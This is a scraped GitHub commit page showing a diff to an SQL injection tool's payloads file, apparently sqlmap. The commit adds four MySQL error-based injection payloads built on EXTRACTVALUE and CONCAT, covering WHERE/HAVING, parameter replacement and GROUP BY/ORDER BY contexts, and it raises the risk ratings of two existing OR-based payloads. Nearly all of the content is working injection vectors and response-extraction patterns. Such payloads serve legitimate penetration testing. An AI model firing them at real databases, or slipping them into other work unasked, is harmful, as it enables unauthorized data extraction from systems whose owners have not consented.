Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit eb42ced

Browse files
stamparmstamparm
committed
adding extractvalue MySQL >= 5.1 error payload (http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages/) - untested (lack of particular ver for testing) and prone to level/risk adjustment
1 parent b743301 commit eb42ced

1 file changed

Lines changed: 82 additions & 2 deletions

File tree

xml/payloads.xml

Lines changed: 82 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1009,6 +1009,26 @@ Formats:
10091009
</details>
10101010
</test>
10111011

1012+
<test>
1013+
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause</title>
1014+
<stype>2</stype>
1015+
<level>2</level>
1016+
<risk>0</risk>
1017+
<clause>1</clause>
1018+
<where>1</where>
1019+
<vector>AND EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1020+
<request>
1021+
<payload>AND EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1022+
</request>
1023+
<response>
1024+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1025+
</response>
1026+
<details>
1027+
<dbms>MySQL</dbms>
1028+
<dbms_version>&gt;= 5.1</dbms_version>
1029+
</details>
1030+
</test>
1031+
10121032
<test>
10131033
<title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
10141034
<stype>2</stype>
@@ -1187,11 +1207,31 @@ Formats:
11871207
</details>
11881208
</test>
11891209

1210+
<test>
1211+
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause</title>
1212+
<stype>2</stype>
1213+
<level>3</level>
1214+
<risk>2</risk>
1215+
<clause>1</clause>
1216+
<where>1</where>
1217+
<vector>OR EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1218+
<request>
1219+
<payload>OR EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1220+
</request>
1221+
<response>
1222+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1223+
</response>
1224+
<details>
1225+
<dbms>MySQL</dbms>
1226+
<dbms_version>&gt;= 5.1</dbms_version>
1227+
</details>
1228+
</test>
1229+
11901230
<test>
11911231
<title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
11921232
<stype>2</stype>
11931233
<level>2</level>
1194-
<risk>0</risk>
1234+
<risk>2</risk>
11951235
<clause>1</clause>
11961236
<where>2</where>
11971237
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</vector>
@@ -1211,7 +1251,7 @@ Formats:
12111251
<title>MySQL OR error-based - WHERE or HAVING clause</title>
12121252
<stype>2</stype>
12131253
<level>3</level>
1214-
<risk>0</risk>
1254+
<risk>2</risk>
12151255
<clause>1</clause>
12161256
<where>2</where>
12171257
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
@@ -1392,6 +1432,26 @@ Formats:
13921432
</details>
13931433
</test>
13941434

1435+
<test>
1436+
<title>MySQL &gt;= 5.1 - Parameter replace</title>
1437+
<stype>2</stype>
1438+
<level>3</level>
1439+
<risk>0</risk>
1440+
<clause>1,2,3</clause>
1441+
<where>3</where>
1442+
<vector>(EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
1443+
<request>
1444+
<payload>(EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
1445+
</request>
1446+
<response>
1447+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1448+
</response>
1449+
<details>
1450+
<dbms>MySQL</dbms>
1451+
<dbms_version>&gt;= 5.1</dbms_version>
1452+
</details>
1453+
</test>
1454+
13951455
<test>
13961456
<title>PostgreSQL error-based - Parameter replace</title>
13971457
<stype>2</stype>
@@ -1493,6 +1553,26 @@ Formats:
14931553
</details>
14941554
</test>
14951555

1556+
<test>
1557+
<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
1558+
<stype>2</stype>
1559+
<level>3</level>
1560+
<risk>0</risk>
1561+
<clause>2,3</clause>
1562+
<where>1</where>
1563+
<vector>,EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
1564+
<request>
1565+
<payload>,EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
1566+
</request>
1567+
<response>
1568+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1569+
</response>
1570+
<details>
1571+
<dbms>MySQL</dbms>
1572+
<dbms_version>&gt;= 5.1</dbms_version>
1573+
</details>
1574+
</test>
1575+
14961576
<test>
14971577
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
14981578
<stype>2</stype>

0 commit comments

Comments
 (0)